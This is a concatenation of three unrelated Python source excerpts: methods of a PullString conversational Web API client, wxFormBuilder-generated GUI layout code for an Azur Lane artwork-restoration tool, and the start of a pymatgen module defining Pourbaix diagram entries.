    You must specify the PullString project ID and a Request object
    carrying a valid API key. Optional Request fields (time zone offset,
    participant, build type) are forwarded to the server.
    """
    import json
    # Canonical form of the project ID: lowercase, no surrounding whitespace.
    body = {'project': project_id.lower().strip()}
    if request:
        if request.time_zone_offset >= 0:
            body['time_zone_offset'] = request.time_zone_offset
        if request.participant_id:
            body['participant'] = request.participant_id
        if request.build_type == BUILD_SANDBOX:
            body['build_type'] = 'sandbox'
        elif request.build_type == BUILD_STAGING:
            body['build_type'] = 'staging'
    # Starting a conversation clears any previous request/response state.
    self.__last_request = None
    self.__last_response = None
    endpoint = self.__get_endpoint(add_id=False)
    return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_text(self, text, request=None):
    """
    Send user input text to the Web API and return the response.
    """
    import json
    payload = json.dumps({"text": text})
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=payload, request=request)
def send_intent(self, intent, entities=None, request=None):
    """
    Send an intent as user input to the Web API and return the response.

    `entities`, when given, is an iterable of Entity objects whose values
    are set alongside the intent.
    """
    import json
    body = {"intent": intent}
    if entities is not None:
        # Dict comprehension instead of a manual accumulation loop.
        body["set_entities"] = {entity.name: entity.value for entity in entities}
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_activity(self, activity, request=None):
    """
    Send an activity name or ID to the Web API and return the response.
    """
    import json
    payload = json.dumps({"activity": activity})
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=payload, request=request)
def send_event(self, event, parameters=None, request=None):
    """
    Send a named event (with optional parameter dict) to the Web API and
    return the response.

    Fixed: `parameters` previously defaulted to a mutable `{}`, which is
    shared across calls; `None` is used as the default instead.
    """
    import json
    ev = {
        'name': event,
        'parameters': {} if parameters is None else parameters,
    }
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=json.dumps({'event': ev}), request=request)
def check_for_timed_responses(self, request=None):
    """
    Ask the Web API whether a time-based response is ready to process.

    Only needed when the previous response reported
    timed_response_interval >= 0: set a timer for that many seconds and
    then call this. Returns None when there is nothing to check.
    """
    last = self.__last_response
    # Nothing to do without a previous response carrying a timed interval.
    if last is None or last.timed_response_interval < 0:
        return None
    # An empty body triggers the server-side timed-response check.
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body="{}", request=request)
def goto(self, response_id, request=None):
    """
    Jump the conversation directly to the response with the specified GUID.
    """
    import json
    payload = json.dumps({"goto": response_id})
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=payload, request=request)
def get_entities(self, entities, request=None):
    """
    Request the current value of the specified entities from the Web API.

    `entities` is an iterable of Entity objects; only their names are sent.
    """
    import json
    # List comprehension instead of a manual append loop.
    body = {'get_entities': [entity.name for entity in entities]}
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def set_entities(self, entities, request=None):
    """
    Change the value of the specified entities via the Web API.

    `entities` is an iterable of Entity objects; their name/value pairs
    are sent to the server.
    """
    import json
    # Dict comprehension instead of a manual accumulation loop.
    body = {'set_entities': {entity.name: entity.value for entity in entities}}
    endpoint = self.__get_endpoint(add_id=True)
    return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_audio(self, bytes, format=FORMAT_RAW_PCM_16K, request=None):
"""
Send an entire audio sample of the user speaking to the Web
API. The default format | |
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Oct 26 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
import wx.adv
###########################################################################
## Class MyFrame1
###########################################################################
class MyFrame1 ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"碧蓝航线立绘还原", pos = wx.DefaultPosition, size = wx.Size( 1024,720 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.m_menubar2 = wx.MenuBar( 0 )
self.menu_file = wx.Menu()
self.m_menu_file = wx.Menu()
self.m_menuItem_tex = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载 Texture2D 文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_tex )
self.m_menuItem_mesh = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载 Mesh 文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_mesh )
self.m_menu_file.AppendSeparator()
self.m_menuItem_rgb = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载RGB通道文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_rgb )
self.m_menuItem_rgb.Enable( False )
self.m_menuItem_alpha = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载alpha通道文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_alpha )
self.m_menuItem_alpha.Enable( False )
self.menu_file.AppendSubMenu( self.m_menu_file, u"加载文件" )
self.m_menu_fold = wx.Menu()
self.m_menuItem_mix = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Texture2D && Mesh", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_mix )
self.m_menuItem_texonly = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Texture2D", u"选择贴图的文件夹", wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_texonly )
self.m_menuItem_meshonly = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Mesh ", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_meshonly )
self.m_menu_fold.AppendSeparator()
self.m_menuItem_rgb_a = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载RGB && Alpha", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_rgb_a )
self.m_menuItem_rgb_a.Enable( False )
self.m_menuItem_rgb_f = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载RGB", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_rgb_f )
self.m_menuItem_rgb_f.Enable( False )
self.m_menuItem_alpha_f = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载Alpha", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_alpha_f )
self.m_menuItem_alpha_f.Enable( False )
self.menu_file.AppendSubMenu( self.m_menu_fold, u"加载文件夹" )
self.menu_file.AppendSeparator()
self.m_menuItem_exit = wx.MenuItem( self.menu_file, wx.ID_ANY, u"退出", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_file.Append( self.m_menuItem_exit )
self.m_menubar2.Append( self.menu_file, u"文件" )
self.m_menu_export = wx.Menu()
self.m_menuItem_all = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"导出全部", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_all )
self.m_menuItem_all.Enable( False )
self.m_menuItem_choice = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"导出选择的文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_choice )
self.m_menuItem_choice.Enable( False )
self.m_menuItem_copy_only = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"把不符合条件的文件直接导出", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_copy_only )
self.m_menuItem_copy_only.Enable( False )
self.m_menu_search = wx.Menu()
self.m_menuItem_tex_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"Texture结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_tex_search )
self.m_menuItem_tex_search.Enable( False )
self.m_menuItem_mesh_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"Mesh结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_mesh_search )
self.m_menuItem_mesh_search.Enable( False )
self.m_menuItem_unable_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"不符合条件结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_unable_search )
self.m_menuItem_unable_search.Enable( False )
self.m_menu_export.AppendSubMenu( self.m_menu_search, u"导出搜索结果" )
self.m_menubar2.Append( self.m_menu_export, u"导出" )
self.SetMenuBar( self.m_menubar2 )
bSizer28 = wx.BoxSizer( wx.HORIZONTAL )
self.m_panel12 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer15 = wx.BoxSizer( wx.VERTICAL )
bSizer40 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bpButton_quick = wx.BitmapButton( self.m_panel12, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|0 )
self.m_bpButton_quick.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_EXECUTABLE_FILE, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapPressed( wx.ArtProvider.GetBitmap( wx.ART_EXECUTABLE_FILE, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapCurrent( wx.ArtProvider.GetBitmap( wx.ART_GO_FORWARD, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapPosition( wx.LEFT )
bSizer40.Add( self.m_bpButton_quick, 0, wx.ALL, 5 )
self.m_staticText_qiuke = wx.StaticText( self.m_panel12, wx.ID_ANY, u"快速导出", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_qiuke.Wrap( -1 )
bSizer40.Add( self.m_staticText_qiuke, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
self.m_gauge_quick = wx.Gauge( self.m_panel12, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_quick.SetValue( 0 )
bSizer40.Add( self.m_gauge_quick, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( bSizer40, 0, wx.EXPAND, 5 )
sbSizer_load_mesh = wx.StaticBoxSizer( wx.StaticBox( self.m_panel12, wx.ID_ANY, u"Mesh" ), wx.HORIZONTAL )
self.m_gauge_mesh_load = wx.Gauge( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_mesh_load.SetValue( 0 )
sbSizer_load_mesh.Add( self.m_gauge_mesh_load, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL, 5 )
self.m_staticline12 = wx.StaticLine( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
sbSizer_load_mesh.Add( self.m_staticline12, 0, wx.EXPAND |wx.ALL, 5 )
self.m_staticText_mesh_load = wx.StaticText( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, u"无任务", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_mesh_load.Wrap( -1 )
sbSizer_load_mesh.Add( self.m_staticText_mesh_load, 1, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( sbSizer_load_mesh, 0, wx.EXPAND, 5 )
sbSizer_load_tex = wx.StaticBoxSizer( wx.StaticBox( self.m_panel12, wx.ID_ANY, u"Texture2D" ), wx.HORIZONTAL )
self.m_gauge_tex_load = wx.Gauge( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_tex_load.SetValue( 0 )
sbSizer_load_tex.Add( self.m_gauge_tex_load, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
self.m_staticline14 = wx.StaticLine( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
sbSizer_load_tex.Add( self.m_staticline14, 0, wx.EXPAND |wx.ALL, 5 )
self.m_staticText_load_tex = wx.StaticText( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, u"无任务", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_load_tex.Wrap( -1 )
sbSizer_load_tex.Add( self.m_staticText_load_tex, 1, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( sbSizer_load_tex, 0, wx.EXPAND, 5 )
self.m_listbook_in = wx.Listbook( self.m_panel12, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LB_DEFAULT )
self.m_panel2 = wx.Panel( self.m_listbook_in, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer7 = wx.BoxSizer( wx.VERTICAL )
bSizer56 = wx.BoxSizer( wx.HORIZONTAL )
self.m_searchCtrl_tex = wx.SearchCtrl( self.m_panel2, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_tex.ShowSearchButton( True )
self.m_searchCtrl_tex.ShowCancelButton( True )
bSizer56.Add( self.m_searchCtrl_tex, 1, wx.ALL|wx.EXPAND, 5 )
self.m_staticline16 = wx.StaticLine( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL|wx.LI_VERTICAL )
bSizer56.Add( self.m_staticline16, 0, wx.EXPAND |wx.ALL, 5 )
m_choice11Choices = [ u"全部", u"有中文名", u"无中文名" ]
self.m_choice11 = wx.Choice( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice11Choices, 0 )
self.m_choice11.SetSelection( 0 )
bSizer56.Add( self.m_choice11, 0, wx.ALL, 5 )
bSizer7.Add( bSizer56, 0, wx.EXPAND, 5 )
m_listBox_texChoices = []
self.m_listBox_tex = wx.ListBox( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_texChoices, wx.LB_ALWAYS_SB|wx.LB_EXTENDED|wx.LB_HSCROLL )
bSizer7.Add( self.m_listBox_tex, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel2.SetSizer( bSizer7 )
self.m_panel2.Layout()
bSizer7.Fit( self.m_panel2 )
self.m_listbook_in.AddPage( self.m_panel2, u"Texture\n", True )
self.m_panel1 = wx.Panel( self.m_listbook_in, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer71 = wx.BoxSizer( wx.VERTICAL )
bSizer57 = wx.BoxSizer( wx.HORIZONTAL )
self.m_searchCtrl_mesh = wx.SearchCtrl( self.m_panel1, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_mesh.ShowSearchButton( True )
self.m_searchCtrl_mesh.ShowCancelButton( True )
bSizer57.Add( self.m_searchCtrl_mesh, 1, wx.ALL|wx.EXPAND, 5 )
self.m_staticline17 = wx.StaticLine( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
bSizer57.Add( self.m_staticline17, 0, wx.EXPAND |wx.ALL, 5 )
m_choice12Choices = [ u"全部", u"有中文名", u"无中文名" ]
self.m_choice12 = wx.Choice( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice12Choices, 0 )
self.m_choice12.SetSelection( 0 )
bSizer57.Add( self.m_choice12, 0, wx.ALL, 5 )
bSizer71.Add( bSizer57, 0, wx.EXPAND, 5 )
m_listBox_meshChoices = []
self.m_listBox_mesh = wx.ListBox( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_meshChoices, wx.LB_ALWAYS_SB|wx.LB_EXTENDED|wx.LB_HSCROLL )
bSizer71.Add( self.m_listBox_mesh, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel1.SetSizer( bSizer71 )
self.m_panel1.Layout()
bSizer71.Fit( self.m_panel1 )
self.m_listbook_in.AddPage( self.m_panel1, u"Mesh", False )
bSizer15.Add( self.m_listbook_in, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel12.SetSizer( bSizer15 )
self.m_panel12.Layout()
bSizer15.Fit( self.m_panel12 )
bSizer28.Add( self.m_panel12, 1, wx.EXPAND |wx.ALL, 5 )
self.m_staticline11 = wx.StaticLine( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
bSizer28.Add( self.m_staticline11, 0, wx.EXPAND |wx.ALL, 5 )
bSizer47 = wx.BoxSizer( wx.VERTICAL )
self.m_notebook_info = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.NB_FIXEDWIDTH )
self.m_panel24 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer45 = wx.BoxSizer( wx.VERTICAL )
m_listBox_logChoices = []
self.m_listBox_log = wx.ListBox( self.m_panel24, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_logChoices, 0 )
bSizer45.Add( self.m_listBox_log, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel24.SetSizer( bSizer45 )
self.m_panel24.Layout()
bSizer45.Fit( self.m_panel24 )
self.m_notebook_info.AddPage( self.m_panel24, u"日志", True )
self.m_panel10 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer22 = wx.BoxSizer( wx.VERTICAL )
self.m_bitmap_show = wx.StaticBitmap( self.m_panel10, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, 0 )
bSizer22.Add( self.m_bitmap_show, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel10.SetSizer( bSizer22 )
self.m_panel10.Layout()
bSizer22.Fit( self.m_panel10 )
self.m_notebook_info.AddPage( self.m_panel10, u"展示区", False )
self.m_panel25 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer46 = wx.BoxSizer( wx.VERTICAL )
m_listBox_errorsChoices = []
self.m_listBox_errors = wx.ListBox( self.m_panel25, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_errorsChoices, 0 )
bSizer46.Add( self.m_listBox_errors, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel25.SetSizer( bSizer46 )
self.m_panel25.Layout()
bSizer46.Fit( self.m_panel25 )
self.m_notebook_info.AddPage( self.m_panel25, u"错误列表", False )
self.m_panel3 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer6 = wx.BoxSizer( wx.VERTICAL )
gSizer5 = wx.GridSizer( 0, 2, 0, 0 )
self.m_searchCtrl_pass = wx.SearchCtrl( self.m_panel3, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_pass.ShowSearchButton( True )
self.m_searchCtrl_pass.ShowCancelButton( False )
gSizer5.Add( self.m_searchCtrl_pass, 0, wx.ALL|wx.EXPAND, 5 )
m_choice_passChoices = [ u"全部", u"航母", u"战列舰", u"驱逐", u"巡洋", u"潜艇", u"其他" ]
self.m_choice_pass = wx.Choice( self.m_panel3, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice_passChoices, 0 )
self.m_choice_pass.SetSelection( 0 )
gSizer5.Add( self.m_choice_pass, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer6.Add( gSizer5, 0, wx.EXPAND, 5 )
m_listBox_skipChoices = []
self.m_listBox_skip = wx.ListBox( self.m_panel3, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_skipChoices, 0 )
bSizer6.Add( self.m_listBox_skip, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel3.SetSizer( bSizer6 )
self.m_panel3.Layout()
bSizer6.Fit( self.m_panel3 )
self.m_notebook_info.AddPage( self.m_panel3, u"跳过文件信息", False )
self.m_panel4 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer72 = wx.BoxSizer( wx.VERTICAL )
gSizer51 = wx.GridSizer( 0, 2, 0, 0 )
self.m_searchCtrl_unable = wx.SearchCtrl( self.m_panel4, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_unable.ShowSearchButton( True )
self.m_searchCtrl_unable.ShowCancelButton( False )
gSizer51.Add( self.m_searchCtrl_unable, 0, wx.ALL|wx.EXPAND, 5 )
m_choice_unableChoices = [ u"全部", u"航母", u"战列舰", u"驱逐", u"巡洋", u"潜艇", u"其他" ]
self.m_choice_unable = wx.Choice( self.m_panel4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice_unableChoices, 0 )
self.m_choice_unable.SetSelection( 0 )
gSizer51.Add( self.m_choice_unable, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer72.Add( gSizer51, 0, wx.EXPAND, 5 )
m_listBox_unableChoices = []
self.m_listBox_unable = wx.ListBox( self.m_panel4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_unableChoices, 0 )
bSizer72.Add( self.m_listBox_unable, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel4.SetSizer( bSizer72 )
self.m_panel4.Layout()
bSizer72.Fit( self.m_panel4 )
self.m_notebook_info.AddPage( self.m_panel4, u"不符合", False )
bSizer47.Add( self.m_notebook_info, 1, wx.EXPAND |wx.ALL, 5 )
self.m_gauge_all = wx.Gauge( self, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_all.SetValue( 0 )
bSizer47.Add( self.m_gauge_all, 0, wx.ALL|wx.EXPAND, 5 )
self.m_staticText_now = wx.StaticText( self, wx.ID_ANY, u"当前:None", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_now.Wrap( -1 )
bSizer47.Add( self.m_staticText_now, 0, wx.ALL, 5 )
self.m_staticText_all = wx.StaticText( self, wx.ID_ANY, u"总进度:0%", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_all.Wrap( -1 )
bSizer47.Add( self.m_staticText_all, 0, wx.ALL, 5 )
gSizer19 = wx.GridSizer( 0, 3, 0, 0 )
self.m_button_gui = wx.Button( self, wx.ID_ANY, u"教程", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button_gui, 0, wx.ALL, 5 )
self.m_button_help = wx.Button( self, wx.ID_ANY, u"帮助", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button_help, 0, wx.ALL, 5 )
self.m_button5 = wx.Button( self, wx.ID_ANY, u"设置", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button5, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer47.Add( gSizer19, 0, wx.ALIGN_RIGHT, 5 )
bSizer28.Add( bSizer47, 1, wx.EXPAND, 5 )
self.SetSizer( bSizer28 )
self.Layout()
self.m_statusBar1 = self.CreateStatusBar( 1, wx.STB_DEFAULT_STYLE|wx.STB_SIZEGRIP, wx.ID_ANY )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_CLOSE, self.close_press )
self.Bind( wx.EVT_MENU, self.load_tex, id = self.m_menuItem_tex.GetId() )
self.Bind( wx.EVT_MENU, self.load_Mesh, id = self.m_menuItem_mesh.GetId() )
self.Bind( wx.EVT_MENU, self.load_rgb, id = self.m_menuItem_rgb.GetId() )
self.Bind( wx.EVT_MENU, self.load_alpha, id = self.m_menuItem_alpha.GetId() )
self.Bind( wx.EVT_MENU, self.load_tex_and_mesh, id = self.m_menuItem_mix.GetId() )
self.Bind( wx.EVT_MENU, self.load_tex_fold, id = self.m_menuItem_texonly.GetId() )
self.Bind( wx.EVT_MENU, self.load_mesh_fold, id = self.m_menuItem_meshonly.GetId() )
self.Bind( wx.EVT_MENU, self.load_rgb_alpha_fold, id = self.m_menuItem_rgb_a.GetId() )
self.Bind( wx.EVT_MENU, self.load_RGB_fold, id = self.m_menuItem_rgb_f.GetId() )
self.Bind( wx.EVT_MENU, self.load_alpha_fold, id = self.m_menuItem_alpha_f.GetId() )
self.Bind( wx.EVT_MENU, self.exit_press, id = self.m_menuItem_exit.GetId() )
self.Bind( wx.EVT_MENU, self.export_all, id = self.m_menuItem_all.GetId() )
self.Bind( wx.EVT_MENU, self.export_choice, id = self.m_menuItem_choice.GetId() )
self.Bind( wx.EVT_MENU, self.copy_file, id = self.m_menuItem_copy_only.GetId() )
self.Bind( wx.EVT_MENU, self.tex_search_ex, id = self.m_menuItem_tex_search.GetId() )
self.Bind( wx.EVT_MENU, self.mesh_search_ex, id = self.m_menuItem_mesh_search.GetId() )
self.Bind( wx.EVT_MENU, self.unable_search_ex, id = self.m_menuItem_unable_search.GetId() )
self.m_bpButton_quick.Bind( wx.EVT_BUTTON, self.quick_work )
self.m_searchCtrl_tex.Bind( wx.EVT_SEARCHCTRL_SEARCH_BTN, self.search_tex )
self.m_searchCtrl_tex.Bind( wx.EVT_TEXT, self.search_tex )
self.m_listBox_tex.Bind( wx.EVT_LISTBOX, self.tex_choice )
self.m_listBox_tex.Bind( | |
<reponame>jmflorez/pymatgen
#!/usr/bin/env python
"""
Module which defines basic entries for each ion and oxide to compute a
Pourbaix diagram
"""
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
__date__ = "December 10, 2012"
import re
import math
from pymatgen.core.periodic_table import Element
from pymatgen.core.structure import Composition
from pymatgen.serializers.json_coders import MSONable
from pymatgen.core.ion import Ion
from pymatgen.phasediagram.entries import PDEntry
PREFAC = 0.0591
class PourbaixEntry(MSONable):
    """
    An object encompassing all data relevant to an ion in a pourbaix diagram.
    Each bulk solid/ion has a free energy g of the form:
    g = g0_ref + 0.0591 log10(conc) - nO mu_H2O + (nH - 2nO) pH
    + phi (-nH + 2nO + q)
    """
    def __init__(self, entry, correction=0.0, entry_id=None):
        """
        Args:
            entry:
                An entry object
                (ComputedEntry/ComputedStructureEntry/PDEntry/IonEntry)
            correction:
                Energy correction applied on top of the entry's energy.
            entry_id:
                Fallback identifier, used only when *entry* carries no
                entry_id attribute of its own.
        """
        if isinstance(entry, IonEntry):
            self._entry = entry
            # Ions get a default concentration of 1e-6 M.
            self._conc = 1.0e-6
            self._phase_type = "Ion"
            self._charge = entry.composition.charge
        else:
            # Solids are treated at unit activity with no net charge.
            self._entry = entry
            self._conc = 1.0
            self._phase_type = "Solid"
            self._charge = 0.0
        # Coefficients of pH, potential and mu_H2O; filled in by
        # _calc_coeff_terms() below.
        self._npH = None
        self._nPhi = None
        self._nH2O = None
        self._nM = None
        self.uncorrected_energy = entry.energy
        self.correction = correction
        self._calc_coeff_terms()
        self._name = self._entry.composition.reduced_formula
        if self._phase_type == "Solid":
            self._name += "(s)"
        try:
            self.entry_id = entry.entry_id
        except AttributeError:
            self.entry_id = entry_id
    @property
    def _g0(self):
        # Alias for the corrected energy; kept for legacy callers.
        return self.energy
    @property
    def energy(self):
        """Corrected energy: uncorrected energy plus correction."""
        return self.uncorrected_energy + self.correction
    @property
    def name(self):
        """
        Returns the entry's name
        """
        return self._name
    def set_name(self, string):
        """
        Set name of entry
        Args:
            string: Input string
        """
        self._name = string
    @property
    def npH(self):
        """
        Returns value of npH, the coefficient of pH
        """
        return self._npH
    @property
    def nH2O(self):
        """
        Returns coefficient of Mu_H2O
        """
        return self._nH2O
    @property
    def nPhi(self):
        """
        Returns nPhi, the coefficient of Phi
        """
        return self._nPhi
    @property
    def g0(self):
        """
        Return g0 for the entry. Legacy function.
        """
        return self._g0
    @property
    def conc(self):
        """
        Return concentration of the entry. Returns 1 if solid.
        """
        return self._conc
    @property
    def conc_term(self):
        """
        Returns the concentration contribution to the free energy:
        normalization_factor * PREFAC * log10(conc).
        """
        return self.normalization_factor * PREFAC * math.log10(self._conc)
    @property
    def phase_type(self):
        """
        Returns whether the entry is a solid/ion.
        """
        return self._phase_type
    def g0_add(self, term):
        """
        Add a correction term to g0.
        Args:
            term:
                Correction term to add to g0
        """
        self.correction += term
    def g0_replace(self, term):
        """
        Replace g0 by a different value.
        Args:
            term:
                New value for g0
        """
        # The replacement becomes the uncorrected energy; any previously
        # accumulated correction is discarded.
        self.uncorrected_energy = term
        self.correction = 0.0
    @property
    def to_dict(self):
        """
        Returns dict which contains Pourbaix Entry data.
        Note that the pH, voltage, H2O factors are always calculated when
        constructing a PourbaixEntry object.
        """
        d = {"@module": self.__class__.__module__,
             "@class": self.__class__.__name__}
        if isinstance(self._entry, IonEntry):
            d["entry type"] = "Ion"
        else:
            d["entry type"] = "Solid"
        d["entry"] = self._entry.to_dict
        d["pH factor"] = self._npH
        d["voltage factor"] = self._nPhi
        d["concentration"] = self._conc
        d["H2O factor"] = self._nH2O
